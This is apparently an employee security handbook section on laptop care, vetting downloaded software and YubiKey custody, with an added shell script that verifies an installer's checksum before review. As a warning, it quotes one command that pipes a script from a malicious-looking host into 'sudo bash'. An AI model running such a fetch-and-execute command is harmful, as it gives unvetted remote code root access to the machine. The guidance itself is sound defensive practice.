How to Treat Your Laptop
Treat your work machine with a level of care representative of someone working in the cybersecurity domain.
- Make sure your hard drive is encrypted, and that logging in requires a password.
- Don’t leave your laptop unattended in public for any length of time.
- Ensure that any devices you connect are inert, or from trusted sources.
- Do not connect external storage media unless you are completely certain of what that storage media contains.
- Do not connect external storage media that has been left unattended.
- Ensure you’ve run the required security checks via Soteria.
Downloading or Installing Software
We don’t use Remote Management software to track or restrict how you use your laptop. We expect you to exercise proper care and diligence when installing software outside of official channels.
In general:
- Inspect ‘new’ open source software before installing/cloning/running it.
- Never pipe wget to bash from sources that are not totally vetted. Example: wget https://dprk-warez.io/install.sh | sudo bash is a big no-no. If you want to experiment with potentially malicious packages, do it in a virtual machine that is not running on your work laptop.
- Trust but verify packages that you install outside of official channels/app stores. For example, you probably don’t need to do much vetting for Apple App Store downloads, but you should vet .dmg downloads from the open web. Equally, you don’t need to vet packages from main-line repos from popular Linux distributions (like Fedora, Debian, etc.) but you certainly should vet any repos that connect to mirrors not controlled and vetted by the main upstream communities.
- Ensure that your usage of open source software adheres to our open source policy, found in our Engineering book.
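One way to follow the "never pipe wget to bash" and "trust but verify" points above is to download to a file, check it against a digest, and read it before running anything. This is an added example, not ZibaSec tooling; the function names are hypothetical, and it assumes you obtained the expected SHA-256 from the publisher through a separate trusted channel.

```shell
#!/bin/sh
# Added example: download-then-verify instead of piping a download into a shell.
# A digest hosted next to the script on the same server only catches corruption,
# so EXPECTED_SHA256 is assumed to come from a separate trusted channel.

# sha256_of FILE: print the lowercase hex SHA-256 (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_installer FILE EXPECTED_SHA256
# Returns 0 on match, 1 on mismatch, 2 on bad input (missing file, malformed digest).
verify_installer() {
    local file="$1" expected="$2" actual
    [ -f "$file" ] || { echo "missing file: $file" >&2; return 2; }
    # Require exactly 64 hex characters so an empty or truncated value never "matches".
    case "$expected" in
        ""|*[!0-9a-fA-F]*) echo "malformed expected digest" >&2; return 2 ;;
    esac
    [ "${#expected}" -eq 64 ] || { echo "malformed expected digest" >&2; return 2; }
    expected="$(printf '%s' "$expected" | tr 'A-F' 'a-f')"
    actual="$(sha256_of "$file")"
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $file: got $actual" >&2
        return 1
    fi
    return 0
}

# fetch_verify_review URL EXPECTED_SHA256
# Downloads to a temp file and verifies it. Nothing is executed here: on success
# the path is printed so the script can be read before anyone decides to run it.
fetch_verify_review() {
    local url="$1" expected="$2" tmp
    tmp="$(mktemp)" || return 2
    wget -q -O "$tmp" "$url" || { rm -f "$tmp"; return 2; }
    if ! verify_installer "$tmp" "$expected"; then
        rm -f "$tmp"   # do not leave an unverified installer lying around
        return 1
    fi
    echo "$tmp"
}
```

Source the file, call fetch_verify_review with the URL and the published digest, then open the printed path in a pager before deciding whether to run it.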
How to Treat Your YubiKey
Our full procedures are detailed in your Hardware Token Usage Agreement. This is a summary.
- The YubiKey should remain in your physical custody at all times unless stored in a locking container in your personal residence, or left in the custody of another authorized person at ZibaSec.
- The YubiKey remains the property of ZibaSec. It would make things complicated if you used it for personal accounts, so please avoid this.
- Bonus! You are authorized to purchase and keep a YubiKey for your own personal use, on us.